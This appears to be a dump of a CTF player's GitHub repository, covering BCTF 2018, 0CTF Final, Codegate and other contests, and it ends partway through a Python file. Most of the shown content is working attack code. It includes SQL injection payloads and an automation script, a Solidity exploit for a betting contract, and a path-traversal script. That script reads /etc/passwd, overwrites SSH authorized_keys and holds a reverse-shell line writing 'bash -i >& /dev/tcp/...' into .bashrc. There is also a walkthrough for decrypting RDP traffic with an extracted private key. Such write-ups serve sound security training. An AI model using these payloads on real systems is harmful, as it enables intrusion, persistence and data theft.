├── 2018 └── bctf │ ├── BCTF Write-Up (LeaveCat).pdf │ ├── babysqli │ ├── flag.txt │ ├── readme.md │ └── run.py │ ├── eosgame │ ├── exploit.sol │ ├── flag.txt │ └── readme.md │ ├── fake3d │ ├── exploit.sol │ ├── flag.txt │ └── readme.md │ └── simplevn │ ├── exploit.html │ ├── flag.png │ └── readme.md ├── 2019 ├── 0ctf_final │ ├── babydb │ │ ├── readme.md │ │ └── solve.py │ └── insecure_rdp │ │ ├── image1.png │ │ ├── image2.png │ │ └── readme.md ├── codegate │ ├── kingmaker │ │ └── solve.py │ ├── pyprot3ct │ │ ├── chal.py │ │ ├── code │ │ ├── dec.py │ │ ├── play.py │ │ └── solve.py │ └── rich-project │ │ └── sqli.py ├── codegate_final │ ├── 2048_map │ │ ├── .gdb_history │ │ └── solve.py │ ├── bash_adventure │ │ └── solve.sh │ ├── readme.md │ └── shage_beta │ │ ├── a.py │ │ ├── readme.md │ │ ├── xx.py │ │ └── z.py ├── defcon │ ├── gloryhost │ │ ├── readme.md │ │ └── solve.c │ ├── lcars │ │ ├── readme.md │ │ └── solve_first.py │ ├── readme.md │ └── rtoos │ │ ├── readme.md │ │ └── solve.py ├── defcon_final │ ├── aoool │ │ └── self_backdoor.py │ ├── jtaste │ │ └── solve.py │ └── telooogram │ │ ├── exploit.py │ │ └── poll_submit_flag.py ├── gctf │ ├── bnv │ │ └── readme.md │ ├── devmaster8000 │ │ └── readme.md │ ├── doomed_to_repeat_it │ │ └── readme.md │ └── glotto │ │ └── readme.md ├── insomnihack │ ├── 1118daysober │ │ ├── a.c │ │ ├── b.c │ │ ├── build_exp.sh │ │ ├── build_leak.sh │ │ ├── libc.s │ │ └── readme.md │ └── l33t-hoster │ │ ├── ..htaccess │ │ ├── build.sh │ │ ├── exp.txt │ │ ├── hack.c │ │ ├── juno.asdf │ │ └── readme.md ├── midnightctf │ └── hfsipc │ │ ├── exploit.c │ │ └── make.sh ├── opcde_mini │ ├── custom_printf_public │ │ ├── readme.md │ │ └── solve.py │ └── misconf_public │ │ ├── main.py │ │ └── readme.md ├── plaid │ ├── potent │ │ └── solve.py │ ├── spectre │ │ ├── readme.md │ │ └── upload_server.py │ └── triggerd │ │ └── solve.py └── realworld │ └── mop │ ├── drop.py │ ├── exp.py │ └── readme.md ├── 2020 └── confidence-pre │ ├── angry-defender.md │ ├── images │ └── 1.png │ ├── juno.exe │ └── two-sandbox-challs.md ├── 2021 └── defcon │ └── readme.md ├── .gitignore ├── README.md └── WhiteHat Grand Prix 06 - KingTigerPrawn - Write Up.pdf /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | .gdb_history 3 | -------------------------------------------------------------------------------- /2018/bctf/BCTF Write-Up (LeaveCat).pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/junorouse/ctf/f27aee83b98117427795e6e3a091f363351a0bc8/2018/bctf/BCTF Write-Up (LeaveCat).pdf -------------------------------------------------------------------------------- /2018/bctf/babysqli/flag.txt: -------------------------------------------------------------------------------- 1 | BCTF{060950FB-839E-4B57-B91D-51E78F56856F} 2 | -------------------------------------------------------------------------------- /2018/bctf/babysqli/readme.md: -------------------------------------------------------------------------------- 1 | # Babysqli 2 | 3 | - Description told me, this is not the finished web server. 4 | - As I know, the hints feature doesn't implemented yet. 5 | - But there were two backend api path. 6 | - /api/captcha 7 | - /api/hints 8 | - /api/hints has a error based sqli vulnerability, but there were so many filters. 9 | 10 | ```javascript 11 | function checkHint (hint) { 12 | return ! / |;|\+|-|\*|\/|<|>|~|!|\d|%|\x09|\x0a|\x0b|\x0c|\x0d|`|gtid_subset|hash|json|st\_|updatexml|extractvalue|floor|rand|exp|json_keys|uuid_to_bin|bin_to_uuid|union|like|sleep|benchmark/ig.test(hint) 13 | } 14 | ``` 15 | 16 | - Also there was a length limit. (<140) 17 | - It was hard to exploit :( 18 | 19 | 20 | ## Payload 21 | 22 | ``` 23 | 'or(select(GTID_SUBTRACT((select(group_concat(column_name))from(information_schema.columns)where(mid(table_name,true,true)='V')),true)))# 24 | 'or(select(GTID_SUBTRACT((select(ZSLRSrpOlCCysnaHUqCEIjhtWbxbMlDkUO)from(vhEFfFlLlLaAAaaggIiIIsSSHeReEE)),true)))# 25 | ``` 26 | -------------------------------------------------------------------------------- /2018/bctf/babysqli/run.py: -------------------------------------------------------------------------------- 1 | from requests import Session 2 | import multiprocessing 3 | import hashlib 4 | from time import sleep 5 | 6 | 7 | class User(object): 8 | captcha = '' 9 | s = None 10 | 11 | REGISTER_URL = 'http://47.93.100.42:9999/api/register' 12 | LOGIN_URL = 'http://47.93.100.42:9999/api/login' 13 | GET_CAPTCHA_URL = 'http://47.93.100.42:9999/api/captcha' 14 | HINT_URL = 'http://47.93.100.42:9999/api/hints' 15 | 16 | HEADERS = { 17 | 'Content-Type': 'application/x-www-form-urlencoded' 18 | } 19 | 20 | def __init__(self, username, password): 21 | self.s = Session() 22 | 23 | u_data = {'username': username, 'password': password} 24 | 25 | self.s.post(self.REGISTER_URL, headers=self.HEADERS, data=u_data) 26 | c = self.s.post(self.LOGIN_URL, headers=self.HEADERS, data=u_data) 27 | 28 | if c.text != '{"msg":"login success"}': 29 | raise IndexError 30 | 31 | def set_captcha(self): 32 | c = self.s.get(self.GET_CAPTCHA_URL) 33 | self.captcha = c.text.split('"captcha":"')[1].split('"')[0].strip() 34 | 35 | def go_sqli(self, code, query): 36 | data = {'captcha': str(code), 'hint': query} 37 | c = self.s.post(self.HINT_URL, headers=self.HEADERS, data=data) 38 | return c.text 39 | 40 | 41 | def set_captcha(d): 42 | user = d['user'] 43 | i = 0 44 | user.set_captcha() 45 | 46 | while True: 47 | if hashlib.md5(str(i)).hexdigest()[0:6] == user.captcha: 48 | d['code'] = i 49 | return i 50 | i += 1 51 | 52 | 53 | WORKER = 20 54 | USERNAME_PREFIX = 'junoXXXXXXMM' 55 | PASSWORD = 'dlawnsdh1234' 56 | 57 | with multiprocessing.Manager() as manager: 58 | user_list = [] 59 | 60 | for i in xrange(WORKER): 61 | d = manager.dict() 62 | d['user'] = User('{}{}'.format(USERNAME_PREFIX, i), PASSWORD) 63 | user_list.append(d) 64 | 65 | mul_list = [] 66 | 67 | for i in xrange(len(user_list)): 68 | mul_list.append(multiprocessing.Process(target=set_captcha, args=(user_list[i],))) 69 | mul_list[i].start() 70 | 71 | while True: 72 | for i in xrange(len(mul_list)): 73 | if not mul_list[i].is_alive(): 74 | result = user_list[i]['user'].go_sqli(user_list[i]['code'], raw_input(">")) 75 | print 'result:', result 76 | print '-------------------' 77 | user_list[i]['user'] = User('{}{}'.format(USERNAME_PREFIX, i), PASSWORD) 78 | mul_list[i] = multiprocessing.Process(target=set_captcha, args=(user_list[i],)) 79 | mul_list[i].start() 80 | 81 | -------------------------------------------------------------------------------- /2018/bctf/eosgame/exploit.sol: -------------------------------------------------------------------------------- 1 | contract Attack { 2 | 3 | address targetContract = 0x804d8B0f43C57b5Ba940c1d1132d03f1da83631F; 4 | int betCount = 0; 5 | 6 | function init() public { 7 | EOSGame(targetContract).initFund(); 8 | betCount = 1; 9 | } 10 | 11 | function exploit() public returns (int) { 12 | 13 | if (isWin()) { 14 | EOSGame(targetContract).bigBlind(); 15 | betCount += 1; 16 | return 1; 17 | } else { 18 | revert(); 19 | return 0; 20 | } 21 | } 22 | 23 | function getFlag() public { 24 | EOSGame(0x4082cC8839242Ff5ee9c67f6D05C4e497f63361a).CaptureTheFlag("anVub3JvdXNlQGdtYWlsLmNvbQ=="); 25 | } 26 | 27 | function getBetCount() public view returns (int) { 28 | return betCount; 29 | } 30 | 31 | function isWin() returns (bool) { 32 | uint256 seed = uint256(keccak256(abi.encodePacked(block.number)))+uint256(keccak256(abi.encodePacked(block.timestamp))); 33 | uint256 seed_hash = uint256(keccak256(abi.encodePacked(seed))); 34 | uint256 shark = seed_hash % 20; // 20 35 | uint256 lucky_hash = uint256(keccak256(abi.encodePacked(betCount))); 36 | uint256 lucky = lucky_hash % 20; // 20 37 | 38 | return shark==lucky; 39 | } 40 | 41 | function viewIsWin(uint256 fuckCount) public view returns (bool) { 42 | uint256 seed = uint256(keccak256(abi.encodePacked(block.number)))+uint256(keccak256(abi.encodePacked(block.timestamp))); 43 | uint256 seed_hash = uint256(keccak256(abi.encodePacked(seed))); 44 | uint256 shark = seed_hash % 20; // 20 45 | uint256 lucky_hash = uint256(keccak256(abi.encodePacked(fuckCount))); 46 | uint256 lucky = lucky_hash % 20; // 20 47 | 48 | return shark==lucky; 49 | } 50 | 51 | function goCalc() public returns (uint256){ 52 | uint256 x = (EOSGame(targetContract).bet_count(msg.sender)); 53 | for (uint256 i=x; i 2 | #iframe1 { 3 | width: 100%%; 4 | height: 8000px; 5 | position:absolute; 6 | margin-top: -2000px; 7 | 8 | } 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /2018/bctf/simplevn/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/junorouse/ctf/f27aee83b98117427795e6e3a091f363351a0bc8/2018/bctf/simplevn/flag.png -------------------------------------------------------------------------------- /2018/bctf/simplevn/readme.md: -------------------------------------------------------------------------------- 1 | # SimpleVN 2 | 3 | - By pass host check with data scheme. 4 | - `data:text/html;base64,PGlmcmFtZSBzdHlsZT0nd2lkdGg6MTAwJTsgaGVpZ2h0OjEwMCU7JyBzcmM9J2h0dHA6Ly94LmltanVuby5jb20vZXhwbG9pdC5odG1sJz48L2lmcmFtZT4=` 5 | - `` 6 | 7 | 8 | ![flag.png](flag.png) 9 | -------------------------------------------------------------------------------- /2019/0ctf_final/babydb/readme.md: -------------------------------------------------------------------------------- 1 | # babydb 2 | 3 | ## vuln (three-lines) 4 | 5 | ```ocaml 6 | | true, name when name = (SessionState.access user) -> 7 | let res = SessionState.put name in 8 | SessionState.bind res (fun _ -> SessionState.return (cont^"login|")) 9 | ``` 10 | 11 | If the code goes to the upper code path, we can set an arbitrary name. 12 | I don't know why but we put "login?user?pass?c:login???:store?a?b?c" on the `batch` command,(by RBTree_Pg_) 13 | `user` => `''`, `args` => `a`. (hooray we can get aribtrary file r/w). 14 | 15 | ## exploit 16 | 17 | We can read arbitrary file but only fisrt line. I faced on `your flag here:` message when I read `../../../../../../flag`. I had to get a Code Execution to read the whole flag. 18 | I am not at on-site. I asked to my teammate "Is port 22 open?", he said yes, I changed the contents of `/home/user/.ssh/authorized_keys` to mine. 19 | 20 | ```shell 21 | $ cat flag 22 | your flag here: 23 | flag{I_want_to_give_web_challenges_a_try_but_still_looks_like_misc_lol} 24 | $ 25 | ``` 26 | -------------------------------------------------------------------------------- /2019/0ctf_final/babydb/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2.7 2 | from requests import post 3 | 4 | URL = 'http://localhost:8000/' 5 | URL = 'http://localhost:31339/' 6 | 7 | def read(path): 8 | c = post(URL+'batch/?a', data="login?junoim?ABCD?c:login???c:load?../../../../../{path}?b?c".format(path=path)) 9 | print c.content 10 | 11 | def write(path, data): 12 | c = post(URL+'batch/?a', data="login?junoim?ABCD?c:login???c:store?../../../../../{path}?{data}?c".format(path=path, data=data)) 13 | print c.content 14 | 15 | ''' 16 | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDYozuBzf1ym5Gd0Mp5TTvre9V4CirnFNSUjC1jSIip8Haag8RFMwbYfi74DuRqOGMohvZ+xjq1Tiraxcof5ZwXXZBaDrFkLFF+sHgx4+4tnXmlRjMYzQDKSMhn36u1MhMHlLKR+oOe8bVWwFMQoT66bGpZ/kN40vSsp8xD2rFbOsY+qYdyGEN3rl7JY1JhTdzIbRZp1dI57AmFMmm/JptB8RQdlBt5tujKLnKohpN2LPD9csb8hLP15Y2IQ1hYbmdI3qkOTYCrYoXFHpeo4t4MInTrqa/orFsHkGai0kYzhn1ZjXlOhe+9VwJjhDZXObpZxNxrlLimMHgN655hRFC7g5tSrBQ4HFZHNFOwiQpFqAGHbCoCHWMYNvdm38J+kUp/4MCyhze18GoNJZSahYM4RgP+cqXor7ENtfBrfAXUTw5mKSTy2CFwwX3Gtwgxoh4sVEIbDLclVCaLL7Tl8OHNfpAz7J6/D8v6oxib5o+FQQrl1zTE18Qtz6AeBxpQ0h8A37e97jbI4ZIRCOoVK5pjO3zQXoTvFV4DbZF+67LtpaGpx2zmcWN58xosnZXOvaaV7OUeeSIaHQ2TPnbtSHneYXzuzEfDywYLNJdZeHRewxKTxDcYrLGW5MAndCzvX5OV0Ly02E/1CU2o6yO/MkGOAX56qb5lPkQBNgHpqpD9vw== blah 17 | ''' 18 | 19 | if __name__ == '__main__': 20 | ''' 21 | post(URL+'register/?junoim', data="ABCD") 22 | 23 | read('../../../../../../../etc/passwd') 24 | write('../../../../../../tmp/1234', 'this is junoim\nwelldone') 25 | write('../abcd', 'this is junoim\nwelldone') 26 | read('../../../../../../tmp/1234') 27 | read('flag') 28 | read('../flag') 29 | read('../../flag') 30 | read('../../../flag') 31 | read('../../../../flag') 32 | read('../../../../../flag') 33 | ''' 34 | 35 | # read('/proc/self/environ') 36 | # read('/etc/supervisor/supervisord.conf') 37 | # read('/etc/supervisor/supervisord.conf') 38 | write('/home/user/.ssh/authorized_keys', 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDU89+PF5dAUsfQU3DLerhV11gsO4WaNlG6qxXzFQDyGanmDa7xGj+F2TfJgKXZRLsphTvAHetqsIiM587h8twuJc7dX6rRcs0N4Q6l0WixSYcUJtAMQerZ2+RKrw7tG5+0NCa8RLhi3Oe/Oay7gIPG0QlHIwU8LmF18HbwsL59Qqbb0550bRv4+ual771ExY2HSKHn+vXVeN84SukyVJRSAjtfGfV0kkRKkBebphdyMnyQnj98VkoJNNtxAI2bzHEuP628Wh3F9dGZa5a50N0AuSDiRxWnVZYn47E5DVTTDak/s/zBryVk2y7EIuLsoj3GUK2DYxImQWZx+S1nCtNP asdf') 39 | read('/home/user/.ssh/authorized_keys') 40 | 41 | if False: 42 | write('../../../../../../../home/user/.bashrc', 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1') 43 | -------------------------------------------------------------------------------- /2019/0ctf_final/insecure_rdp/image1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/junorouse/ctf/f27aee83b98117427795e6e3a091f363351a0bc8/2019/0ctf_final/insecure_rdp/image1.png -------------------------------------------------------------------------------- /2019/0ctf_final/insecure_rdp/image2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/junorouse/ctf/f27aee83b98117427795e6e3a091f363351a0bc8/2019/0ctf_final/insecure_rdp/image2.png -------------------------------------------------------------------------------- /2019/0ctf_final/insecure_rdp/readme.md: -------------------------------------------------------------------------------- 1 | # Insecure RDP 2 | 3 | > aka super-guess challenge 4 | 5 | ## Attempt 1 6 | 7 | Old-rdp uses rc4 128 bit encryption for secure-connection. To make rc4 encryption key rdp uses RSA asymmetric crypto, btw the key is really short(512 bit). 8 | 9 | At the first time, I mistaken the bytes are right order. 10 | I put that number(N) and search on factordb. (http://factordb.com/index.php?query=8585773518239202618014259252265007041474576494007326305566936231179558082498454385604139747248680116141231666404283485452921757852460000935905449875937236) 11 | Sadly it could not be a (N) since this is not a (prime1 * prime2) form. 12 | 13 | Yes, I notice that the bytes are reverse order. (http://factordb.com/index.php?query=11108191436132586895020456675719608627041223049898764263726511071041880035545059834370244436455550875653187155250844471535388827581310104544771906189127331) 14 | But I can't find its private key..... 15 | 16 | ## Attempt 2 17 | 18 | I looked again the pcap file slowly. I figure out that `serverCertificate` has a little difference between regular rdp packets. 19 | 20 | ![image1.png](image1.png) 21 | 22 | The normal rdp packets do not contains `RSA2` part. Yes, this is the form of LSA secret. :( 23 | 24 | ``` 25 | C:\>LsaSecretReader.exe L$HYDRAENCKEY_28ada6da-d622-11d1-9cb9-00c04fb16e75 26 | ====================================================== 27 | = LSA secret reader by Passcape Software = 28 | = Visit http://www.passcape.com for more information = 29 | ====================================================== 30 | 31 | 0000: 52 53 41 32 48 00 00 00 00 02 00 00 3F 00 00 00 32 | 0010: 01 00 01 00 ED F1 18 33 9E 6C F3 08 88 CA D5 2A 33 | 0020: 43 92 15 47 E3 CE 96 2E B3 63 97 85 DC 24 33 58 34 | 0030: 8A 8C 89 E2 16 06 C2 39 40 95 D8 C4 81 60 45 81 35 | 0040: 8E 00 7D 26 17 8F F5 C7 9D 7A 46 1B 03 83 6B DF 36 | 0050: 66 60 DA BD 00 00 00 00 00 00 00 00 C5 2E C2 9A 37 | 0060: CD 5C 85 91 09 37 C7 45 A8 76 C3 9F E8 AD D6 D6 38 | 0070: 21 2B 44 FF 9A 5B 99 70 62 88 24 ED 00 00 00 00 39 | 0080: 09 E9 24 CA 37 F3 88 DE B2 E5 02 BF F7 4B E9 C2 40 | 0090: 0C 28 D3 D8 40 72 6F 49 D2 CC E6 D3 62 2D F3 CC 41 | 00A0: 00 00 00 00 CD 0B 24 05 48 0A CA A0 F6 54 5B 32 42 | 00B0: A2 0F 3F AB EC 2A DF C9 BD D7 FB BE C0 D1 E6 CA 43 | 00C0: 25 5A C5 E3 00 00 00 00 B9 D7 FD 7F EB AB EF D5 44 | 00D0: 57 10 F0 6C F5 76 9B 79 9E 91 E3 D4 7F C7 74 71 45 | 00E0: C1 C7 2E 67 B3 DE 49 17 00 00 00 00 3B 44 55 4B 46 | 00F0: 46 21 AC 8F 38 A6 A8 A5 D7 06 31 0D 2A DA D1 D6 47 | 0100: E4 2C ED D9 4F A4 D3 6D 35 E4 54 06 00 00 00 00 48 | 0110: 81 E9 5D D8 37 C1 AD C5 A6 82 02 CF A7 D0 1D 9F 49 | 0120: AE 10 C9 9F 69 0A CD C4 58 BD 76 DE 3C DC 9D 7F 50 | 0130: 1E 31 D1 C0 AD 2F A8 9B 84 33 73 5C 5D CE 29 D7 51 | 0140: 12 60 41 D6 2C AD 3F 70 A7 24 8C 60 E9 48 82 39 52 | 0150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 53 | 0160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 | 0170: 00 00 00 00 00 00 00 00 00 00 00 00 55 | 56 | This gives public key of: 57 | 52 53 41 31 48 00 00 00 00 02 00 00 3f 00 00 00 58 | 01 00 01 00 ed f1 18 33 9e 6c f3 08 88 ca d5 2a 59 | 43 92 15 47 e3 ce 96 2e b3 63 97 85 dc 24 33 58 60 | 8a 8c 89 e2 16 06 c2 39 40 95 d8 c4 81 60 45 81 61 | 8e 00 7d 26 17 8f f5 c7 9d 7a 46 1b 03 83 6b df 62 | 66 60 da bd 00 00 00 00 00 00 00 00 63 | 64 | ..and private key of 65 | 81 e9 5d d8 37 c1 ad c5 a6 82 02 cf a7 d0 1d 9f 66 | ae 10 c9 9f 69 0a cd c4 58 bd 76 de 3c dc 9d 7f 67 | 1e 31 d1 c0 ad 2f a8 9b 84 33 73 5c 5d ce 29 d7 68 | 12 60 41 d6 2c ad 3f 70 a7 24 8c 60 e9 48 82 39 69 | ``` 70 | 71 | ![image2.png](image2.png) 72 | 73 | ```shell 74 | root@junoim-deploy:~/0ctf/RDP-Replay# cat /tmp/aaa.txt 75 | aa,5253413148000000000200003f00000001000100a3ee630330a342da4c477e0a1012539dbf8533188d24f8ed822d69f26950ebce783c144a619465e6d2abd43efea475fbd8a45e6905b951ffebe931c66eb517d40000000000000000,41D130517AB164326D6B6D4A3620B4839B6126C72E03D38F7D7A7523C568F8D84E24147BD1377754D700C10B441E5FD13FE69B70F6BCC3B93609092451D72641 76 | root@junoim-deploy:~/0ctf/RDP-Replay# replay/rdp_replay -r /tmp/out.pcap -l /tmp/aaa.txt --save_clipboard --show_keys > output3 77 | root@junoim-deploy:~/0ctf/RDP-Replay# cat output3 78 | Processed 1 private keys 79 | 1440x900x8 80 | We have the private key for this server: aa 81 | error: no keyboard mapping available! 82 | Warning xf_GetWindowProperty (142): Property 314 does not exist 83 | rnotepad 84 | flag{}779a099914144e6c512b0581 85 | ``` 86 | -------------------------------------------------------------------------------- /2019/codegate/kingmaker/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import sys 3 | 4 | context.arch = 'amd64' 5 | context.terminal = ['tmux', 'splitw', '-h'] 6 | KT = [ 7 | '', 8 | 'lOv3\x00', 9 | 'D0l1', 10 | 'HuNgRYT1m3', 11 | 'F0uRS3aS0n', 12 | 'T1kT4kT0Kk', 13 | ] 14 | 15 | i0 = i1 = i2 = i3 = i4 = i5 = i6 = i7 = i8 = i9 = i10 = 0 16 | 17 | 18 | ''' 19 | for i0 in xrange(1, 3): 20 | for i1 in xrange(3): 21 | open('count', 'wb').write(str(i0) + ',' + str(i1)) 22 | for i2 in xrange(3): 23 | for i3 in xrange(2): 24 | for i4 in xrange(2): 25 | for i5 in xrange(9): 26 | for i7 in xrange(2): 27 | for i8 in xrange(3): 28 | for i9 in xrange(3): 29 | for i10 in xrange(2): 30 | 31 | ''' 32 | 33 | i0 = 1 34 | i1 = 2 35 | i2 = 1 36 | i3 = 0 37 | i4 = 1 38 | i5 = 5 39 | i6 = 0 40 | i7 = 0 41 | i8 = 0 42 | i9 = 2 43 | i10 = 0 44 | 45 | # r = process('./d') 46 | r = remote('110.10.147.104', 13152) 47 | 48 | r.sendline('1') 49 | r.sendline(KT[1]) 50 | r.sendline('1') 51 | r.sendline('2') 52 | 53 | def x1(q): 54 | if q == 0: r.sendline('1') 55 | elif q == 1: r.sendline('2') 56 | elif q == 2: r.sendline('3') 57 | 58 | def x2(q): 59 | if q == 0: r.sendline('1') 60 | elif q == 1: r.sendline('2') 61 | elif q == 2: r.sendline('3') 62 | 63 | def x3(q): # PASS_1 64 | if q == 0: 65 | r.sendline('1') 66 | elif q == 1: 67 | r.sendline('2') 68 | r.sendline('1') 69 | x4(i3) 70 | elif q == 2: 71 | r.sendline('3') 72 | r.sendline('1') 73 | 74 | def x4(q): 75 | if q == 0: 76 | r.sendline('1') 77 | elif q == 1: 78 | r.sendline('2') 79 | 80 | 81 | def x5(q): 82 | if q == 0: 83 | r.sendline('1') 84 | r.sendline('2') 85 | r.sendline('2') 86 | elif q == 1: 87 | r.sendline('2') 88 | if i10 == 0: 89 | r.sendline('1') 90 | elif i10 == 1: 91 | r.sendline('2') 92 | 93 | def x6(q): 94 | if q == 0: 95 | r.sendline('1') 96 | r.sendline('1') 97 | r.sendline('2') 98 | elif q == 1: 99 | r.sendline('1') 100 | r.sendline('2') 101 | r.sendline('1') 102 | elif q == 2: 103 | r.sendline('1') 104 | r.sendline('2') 105 | r.sendline('3') 106 | 107 | elif q == 3: 108 | r.sendline('2') 109 | r.sendline('1') 110 | r.sendline('2') 111 | elif q == 4: 112 | r.sendline('2') 113 | r.sendline('2') 114 | r.sendline('1') 115 | elif q == 5: 116 | r.sendline('2') 117 | r.sendline('2') 118 | r.sendline('3') 119 | 120 | elif q == 6: 121 | r.sendline('3') 122 | r.sendline('1') 123 | r.sendline('2') 124 | elif q == 7: 125 | r.sendline('3') 126 | r.sendline('2') 127 | r.sendline('1') 128 | elif q == 8: 129 | r.sendline('3') 130 | r.sendline('2') 131 | r.sendline('3') 132 | 133 | def x7(q): 134 | if q == 0: 135 | r.sendline('1') 136 | r.sendline('2') 137 | elif q == 1: 138 | r.sendline('2') 139 | if i7 == 0: 140 | r.sendline('1') 141 | elif i7 == 1: 142 | r.sendline('2') 143 | 144 | def x8(q): 145 | if q == 0: 146 | r.sendline('1') 147 | r.sendline('2') 148 | elif q == 1: 149 | r.sendline('2') 150 | elif q == 2: 151 | r.sendline('1') 152 | r.sendline('1') 153 | r.sendline('2') 154 | 155 | 156 | def x9(q): 157 | if q == 0: 158 | r.sendline('2') 159 | r.sendline('1') 160 | r.sendline('1') 161 | elif q == 1: 162 | r.sendline('2') 163 | r.sendline('1') 164 | r.sendline('2') 165 | elif q == 2: 166 | r.sendline('3') 167 | r.sendline('2') 168 | 169 | x1(i0) 170 | x2(i1) 171 | 172 | r.sendline(KT[2]) 173 | r.sendline('1') 174 | 175 | x3(i2) 176 | x5(i4) 177 | 178 | # r.sendline('1') 179 | # r.sendline('1') 180 | # r.sendline('2') 181 | # r.sendline('2') 182 | 183 | 184 | r.sendline(KT[3]) 185 | 186 | x6(i5) 187 | 188 | r.sendline(KT[4]) 189 | 190 | r.sendline('1') 191 | r.sendline('1') 192 | r.sendline('\x00') # BUG 193 | 194 | x8(i8) 195 | 196 | r.sendline(KT[5]) 197 | 198 | x9(i9) 199 | 200 | # context.log_level = 'debug' 201 | r.recvuntil('King : Congratuations for pass all the tests.') 202 | r.recvuntil('SYSTEM : Your point\n') 203 | data = r.recvuntil('King : Wh').split('\n') 204 | print data 205 | 206 | w = [] 207 | for i in xrange(5): 208 | w.append(int(data[i][-1])) 209 | 210 | print w 211 | 212 | juno = True 213 | for asdf in xrange(5): 214 | if w[asdf] != 5: 215 | juno = False 216 | break 217 | 218 | 219 | print i0 ,i1 , i2 , i3 , i4 , i5 , i6 , i7 , i8 , i9, i10 220 | 221 | if juno: 222 | print 'FOUND!!!!!!!!!!!!!!' 223 | r.interactive() 224 | 225 | r.close() 226 | 227 | 228 | 229 | -------------------------------------------------------------------------------- /2019/codegate/pyprot3ct/chal.py: -------------------------------------------------------------------------------- 1 | import play 2 | 3 | f = open("code", "rb") 4 | code = f.read() 5 | code = bytearray(code) 6 | f.close() 7 | 8 | flag = input().strip() 9 | flag = bytearray(flag, "utf-8") 10 | 11 | if play.first_call(code, flag): 12 | print(":)") 13 | else: 14 | print(":(") -------------------------------------------------------------------------------- /2019/codegate/pyprot3ct/code: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/junorouse/ctf/f27aee83b98117427795e6e3a091f363351a0bc8/2019/codegate/pyprot3ct/code -------------------------------------------------------------------------------- /2019/codegate/pyprot3ct/dec.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | res = 15164928151071436234 3 | 4 | for i in range(127): 5 | res = ((res << 7) & 2**64-1) | res >> 0x39 6 | res = (res >> 0x20) | ((res & (2**32-1)) << 32) 7 | n1 = res & 2**32-1 8 | n2 = res >> 0x20 9 | n1 = ((n1 - 0xffc2bdec) & 2**32-1) ^ 0xffc2bdec 10 | n2 = ((n2 - 0xffc2bdec) & 2**32-1) ^ 0xffc2bdec 11 | res = n1 << 32 | n2 12 | 13 | X = hex(res)[2:-1] 14 | print X[8:].decode('hex') + X[0:8].decode('hex') 15 | -------------------------------------------------------------------------------- /2019/codegate/pyprot3ct/play.py: -------------------------------------------------------------------------------- 1 | def SAVE_TO_INT(_SAVE): 2 | KEY=_SAVE[2001] 3 | KEY=KEY.decode("utf-8") 4 | VALUE=_SAVE[2002] 5 | VALUE=VALUE.decode("utf-8") 6 | VALUE=int(VALUE) 7 | _SAVE[KEY]=VALUE 8 | return 9 | 10 | def O0O000000OO0OOO0O(OO000OO00000OO0OO): 11 | OOOO000O000OO0O0O=2001 12 | OO0OO0OOOOOOO0OO0=2002 13 | 14 | O0O000O000OOO0OO0=OO000OO00000OO0OO[2001] 15 | O0O000O000OOO0OO0=O0O000O000OOO0OO0.decode("utf-8") 16 | 17 | O0O0OO00OOO0O0OO0=OO000OO00000OO0OO[2002] 18 | O0O0OO00OOO0O0OO0=O0O0OO00OOO0O0OO0.decode("utf-8") 19 | 20 | O0O0OO00OOO0O0OO0=OO000OO00000OO0OO[O0O0OO00OOO0O0OO0] 21 | OO000OO00000OO0OO[O0O000O000OOO0OO0]=O0O0OO00OOO0O0OO0 22 | return 23 | 24 | def GET_FLAG_BY_IDX(OO0OO0O0O0OOOO0O0): 25 | arg1=OO0OO0O0O0OOOO0O0[2001] 26 | arg1=arg1.decode("utf-8") 27 | arg2=OO0OO0O0O0OOOO0O0[2002] 28 | arg2=arg2.decode("utf-8") 29 | arg2=OO0OO0O0O0OOOO0O0[arg2] # FLAG 30 | 31 | O0000000OOOO0OOO0=OO0OO0O0O0OOOO0O0[2003] 32 | O0000000OOOO0OOO0=O0000000OOOO0OOO0.decode("utf-8") 33 | 34 | if O0000000OOOO0OOO0.isdigit(): 35 | O0000000OOOO0OOO0=int(O0000000OOOO0OOO0) 36 | else: 37 | O0000000OOOO0OOO0=OO0OO0O0O0OOOO0O0[O0000000OOOO0OOO0] 38 | 39 | OO0OOOOO000OO0OOO=arg2[O0000000OOOO0OOO0] 40 | 41 | print("SAVE[{}] = FLAG[{}]".format(arg1, O0000000OOOO0OOO0)) 42 | OO0OO0O0O0OOOO0O0[arg1]=OO0OOOOO000OO0OOO 43 | return 44 | def O0O0O0000O00OO00O(O000O000O00000O0O): 45 | OO0OO0OO00O0OO0OO=2001 46 | OO0OO0OOO000000O0=2002 47 | OOOO00OOO0OO00O00=2003 48 | O0O0O0OO0O0O00O00=2004 49 | O00000O000O0000OO=O000O000O00000O0O[OO0OO0OO00O0OO0OO] 50 | O00000O000O0000OO=O00000O000O0000OO.decode("utf-8") 51 | O0O00000O00OOO000=O000O000O00000O0O[OO0OO0OOO000000O0] 52 | O0O00000O00OOO000=O0O00000O00OOO000.decode("utf-8") 53 | OO0O00O0OO0OO0000=O000O000O00000O0O[OOOO00OOO0OO00O00] 54 | OO0O00O0OO0OO0000=OO0O00O0OO0OO0000.decode("utf-8") 55 | if OO0O00O0OO0OO0000.isdigit(): 56 | OO0O00O0OO0OO0000=int(OO0O00O0OO0OO0000) 57 | else: 58 | OO0O00O0OO0OO0000=O000O000O00000O0O[OO0O00O0OO0OO0000] 59 | OO0000O00O00OO00O=O000O000O00000O0O[O0O0O0OO0O0O00O00] 60 | OO0000O00O00OO00O=OO0000O00O00OO00O.decode("utf-8") 61 | if OO0000O00O00OO00O.isdigit(): 62 | OO0000O00O00OO00O=int(OO0000O00O00OO00O) 63 | else: 64 | 